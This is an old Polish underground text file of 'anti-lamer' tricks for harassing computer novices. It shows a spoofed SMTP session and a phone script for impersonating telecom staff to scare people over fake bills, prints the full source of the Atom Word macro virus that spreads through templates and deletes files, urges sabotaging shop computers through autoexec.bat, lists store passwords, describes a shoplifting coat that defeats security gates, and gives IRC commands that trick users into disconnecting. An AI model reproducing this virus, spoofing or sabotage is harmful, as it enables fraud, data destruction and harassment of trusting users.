

                                    G@la^S
 
                                AntiLAMER text
````````````````````````````````````````````````````````````````````````````````
 Nie daj sie zwiesc! Telewizja, radio, prasa, starzy i koledzy - ONI CIE ZGNOJA
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,



Ponizszy tekst jest wynikiem nudy i nerwicy spowodowanej glupimi i meczacymi
pytaniami lamerow. Osobiscie nie mam nic do tempakow i lamerow (sam nie jestem
jakims guru, ale mnie wystarczy powiedziec raz i raczej zdaje sobie sprawe z
tego, ze glupie pytania moga naprawde wkurzyc).

Moja dewiza: Nie daj innym powodu do nazywania cie lamerem - ucz sie duzo,
             czytaj FAQ, badz zawsze lepszy... :)



------ Sposoby na lamerow

1. Zawal lamera
2. Zabawy z rejestrem ;)
3. Makra dla worda :)
4. Duze sklepy  ^NEW^
5. EMPIK        ^NEW^
6. Tricki IRC (bez zbednych objasnien)


  1. Zawal lamera - czyli jak spowodowac atak serca :)

Sa na to dwa sposoby. Ja preferuje pierwszy, poniewaz ze wzgledu na moja wade
wymowy i glupi glos drugi sposob nie dziala :)
I.  Wysylasz lamerowi fake maila. Czyli.
	>telnet mail.geocities.com:25   (lub inny server, np: www.us.edu.pl:25)
	#serwer sie zglasza, najczesciej podaje wersje sendmaila
	>mail from: sysadmin@tpnet.pl   (ten adres jest najlepszy)
	>rcpt  to: pieprzony@dupek.com  (bez tlumaczenia)
	>data
	#tu serwer podaje komunikat gotowosci do przyjecia textu
	>mail from: sysadmin@tpnet.pl
	>mail to: pieprzony@dupek.com
	>subject: Nadwyzka w oplatach za korzystanie z sieci internet
	#Temat to juz wymyslcie sami....
	#Potem napiszcie, ze musi doplacic bo n.p. TPSA zmienila sposob oplat
	#i teraz 0202122 kosztuje 3,70/min :)
	#na koncu listu zrobcie jakis 'signature'
	#potem piszesz
	>.
	>quit
	#i konczysz polaczenie :)
   To jest fajny sposob, bo moze nastraszyc :)... Najlepiej dziala na poczatku
   miesiaca, bo wtedy jak taki lamer dostanie taki email to do konca miesiaca
   (a czasami dluzej, to zalezy kiedy dostanie rachunek) nie dzwoni :))))

II.  Metoda dzwoniona. Wykrecasz numer lamera. Hmmmm... Najlepiej przedstawie
     to na przykladzie rozmowy: (najlepiej zeby odebrali rodzice :))
	<ty> Dzien dobry
	<xx> Dzien dobry, slucham?
	<ty> Czy to numer xxx-xx-xx?
	<xx> Tak, o co chodzi?
	<ty> Nazywam sie XXX XXXXXX, dzwonie z centrali TPSA (podaj jakis
	     numerek, albo nazwe miasta, zeby bylo naukowo :))))
	<xx> Dobrze, ale o co chodzi?
	<ty> Czy u Pani(Pana) w domu korzysta sie z internetu?
	<xx> Tak, syn sie tym bawi czasami :))
	<ty> Mam dla Pani(Pana) przykra wiadomosc, prosze sobie usiasc.
	     Pani syn, po przez zle skonfigurowanie oprogramowania laczyl sie
	     nie z numerem TPSA - 0202122, lecz przez (jakis tam kraj),
	     bo wykrecal 0020 - czyli kierunkowy. I w zwiazku z tym rachunek
	     wynosi XXXXXXXX hehehehe :)
	<xx> O rany, to niemozliwe...
	<ty> Niestety. Moze Pani(Pan) napisac odwolanie.....
    No, dalej to juz sami wiecie, chodzi o to aby nie byc zbyt milym w rozmowie
    bo jak wiemy to w TPSA pracuja same chamy i raczej mili to oni nie sa :)



  2. Zabawy z rejestrem

OOOOoooooo!!!!! Nie chce mi sie na ten temat pisac... W zasadzie to firma
MicroSmoft chyba dla naszej zabawy stworzyla rejestr :) i regedit :))))))
Kazdy klucz rejestru (plik *.reg) mozna albo uruchomic, albo kazac komputerowi
go uruchomic, naprzyklad przez wpisanie w win.ini do linijki run=
sciezki dostepu do klucza :)
Nie bede tu wypisywal sposobow na rozwalenie komputera przez rejestr bo to juz
sie staje nudne. Jak by ktos jednak chcial cos wiedziec, albo podzielic sie
doswiadczeniami to niech do mnie mailuje ... (adres na koncu)



  3. Makra dla MS Word
Hehe... To juz temat stary jak rzeka... Ale i tak 99% ludzi nie wie co na nich
czycha :)
Najlatwiej i najbardziej zlosliwie to zrobic:
makro: FileOpen
--- CUT HERE ---
Sub FileOpen()
	Application.Quit
End
--- CUT HERE ---


, lub to samo makro ale pod nazwa AutoOpen :)))))
... Jak ktos choc troche sie zna na tych rzeczach to bedzie wiedzial co robic...
A tu kod zrodlowy do Atom Makro :)


--- CUT HERE ---
Atom - Virus for WinWord 6,7


Macros: Atom

Sub MAIN
On Error Goto KillError
If Day(Now()) = 13 And Month(Now() = 12) Then
	Kill "*.*"
End If
KillError:
End Sub



Macros: AutoOpen

Sub MAIN
Dim FN$
FN$ = FileName$()
On Error Goto ErrorInfectGlobalTemplate
If (CheckInfected = 0) Then
	MacroCopy FN$ + ":FileSaveAs", "FileSaveAs", 1
	MacroCopy FN$ + ":FileOpen", "FileOpen", 1
	MacroCopy FN$ + ":AutoOpen", "AutoOpen", 1
	MacroCopy FN$ + ":Atom", "Atom", 1
	SaveTemplate		
End If
Call Atom
ErrorInfectGlobalTemplate:
End Sub

Function CheckInfected
CheckInfected = 0
If (CountMacros(0) >= 4) Then
	For I = 1 To CountMacros(0)
		If (MacroName$(I, 0) = "Atom") Then
			CheckInfected = 1
		End If 			
	Next I		   
End If
End Function



Macros: FileOpen

Sub MAIN
On Error Goto InfError
Dim dlg As FileOpen
GetCurValues dlg
Dialog dlg
FileOpen dlg
MacroCopy "AutoOpen", Dlg.Name + ":AutoOpen", 1
MacroCopy "FileSaveAs", Dlg.Name + ":FileSaveAs", 1
MacroCopy "FileOpen", Dlg.Name + ":FileOpen", 1
MacroCopy "Atom", Dlg.Name + ":Atom", 1
FileSaveAs .Format = 1
InfError:
End Sub



Macros: FileSaveAs

Sub MAIN
Dim dlg As FileSaveAs
GetCurValues dlg
Dialog dlg
If (Dlg.Format = 0) Or (Dlg.Format = 1) Then
	MacroCopy "FileSaveAs", WindowName$() + ":FileSaveAs", 1
	MacroCopy "AutoOpen", WindowName$() + ":AutoOpen", 1
	MacroCopy "FileOpen", WindowName$() + ":FileOpen", 1
	MacroCopy "Atom", WindowName$() + ":Atom", 1
	Dlg.Format = 1
End If
If (Second(Now()) = 13) Then
	Dlg.Password = "ATOM#1"
End If  
FileSaveAs dlg
End Sub
--- CUT HERE ---



  4. Duze sklepy

Napewno wielu z was ma gdzies w okolicy duzy sklep typu Office Depot albo Center
czy cos takiego. Chodzi mi o to, ze w takich sklepach sa zazwyczaj komputery :)
Oczywiscie pokazuje je nam obsluga, bo normalnie to jest wygaszacz ekranu
Windoze zabezpieczony haslem ack...:). DObra. Naogol w takich sklepach jest
minimum z 5 osob w obsludze, hasla zaklada jedna osoba, wiec sa latwe, np:
Office Depot (Katowice) --- bylo  officed      (chyba zmienili od niedawna :))
Office Centre (Makro-Sosnowiec) --- jest office (na wszystkich puterach, nawet
                                                 na tych zmyslowych laptopikach)
Poczatkowo to odrazu formatowalem HDD (ludzie uwazaja mnie za chama, ale ja mam
juz dosyc). Teraz albo zmieniam haslo i patrze co robi gosc jak go poprosze
zeby mi pokazal jak to wyglada (hehe... stary szleje przy tym jak mu sie 
wygaszacz nie wylacza bo mu hasla nie przyjmuje). Ale fajniej jest zrobic tak:
Idziesz wieczorem (nie rano, bo w ciagu dnia sie bawia na tych sprzetach i to
by zmniejszylo poziom paniki :))). Edytujesz odpowiednio autoexec.bat lub
winstart.bat. Rano jak uruchomia komputery i cos sie spierdoli to bedzie na nich
:))))))))))))))))))))))))))) Kocham to.....



  5. EMPIKi

Kiedys spotkala mnie bardzo ciekawa historia. Bylismy z kumplem w EMPIKU, jak
zwykle zwiedzalismy dzial multimedia i przy wychodzeniu zaczela pikac bramka
(CHECKPOINT SYSTEM)... hmmmmm.... wkurwilem sie ostro bo po testach ochroniazy
okazalo sie ze to ja jestem przyczyna pikania. Te gnoje wziely mi plecak i 
wywalily wszystko na podlage... nic nie znalezli, ale nawet nie wlozyli
spowrotem... Oczywiscie kolejnego dnia zadzwonilem tam i ostro zjebalem
kierownictwo :)... Ale nie o to chodzi. Zaraz po tym incydencie podszedl do nas
gosc i mowi:
<on>: i co nic wam nie znalezli? jaki masz sposob?
<ja>: co? mysmy tym razem nic nie kradli :)
<on>: ja mam swoj sposob, zrobilem juz tak z 5mln na EMPIKach
i gosc pokazuje plaszcz (poczatkowo przestraszylem sie ze to jakis 
exchibicjonista :)) a tam cala podszewka z podwojnej folii aluminiowej i jescze
jakis inny ekran.
Nie wiem czy to dziala, ale jak testowalem w mojej wypozyczalni wideo to
dzialalo :) ... ale ja nie jestem zlodziejem, lecz proponuje wam sprobowac
ekranu z tych toreb-zamrazarek dostepnych w duzych marketach :)))


  6. Tricki IRC

Jest wiele skryptow i sztuczek ... Ale zawsze warto powiedziec lamerowi by np.
cos zrobil, oni sa na ogol tak ufni, ze to robia, wiec:
/join #5,0
/who *
/whois K9  (dziala tylko na Chatnet, ale zamias K9 moze byc jakis inny duzy BOT)
/list      (niby pomocnicze, ale na ogol rozlacza)
/flood off (a potem to juz wiemy :))

No, nie jest tego wiele, ale mozemy tez powiedziec, aby dodal do remotes linie
on 1:#:JOIN:/part $chan
hehe
albo
on 1:#:JOIN:/exit

i powiedziec, ze mu to da opa :)



--------------------------------------------------------------------------------
Na razie to tyle, nie wiem czy cos sobie jeszcze przypomne, jesli tak to to
napisze, ale juz prawie wszystko bylo raz gdzies napisane :)

Gala^S --   hookuper@kki.net.pl
=================     www.kki.net.pl/phantasy/gala/index.html
=================     www.kki.net.pl/phantasy


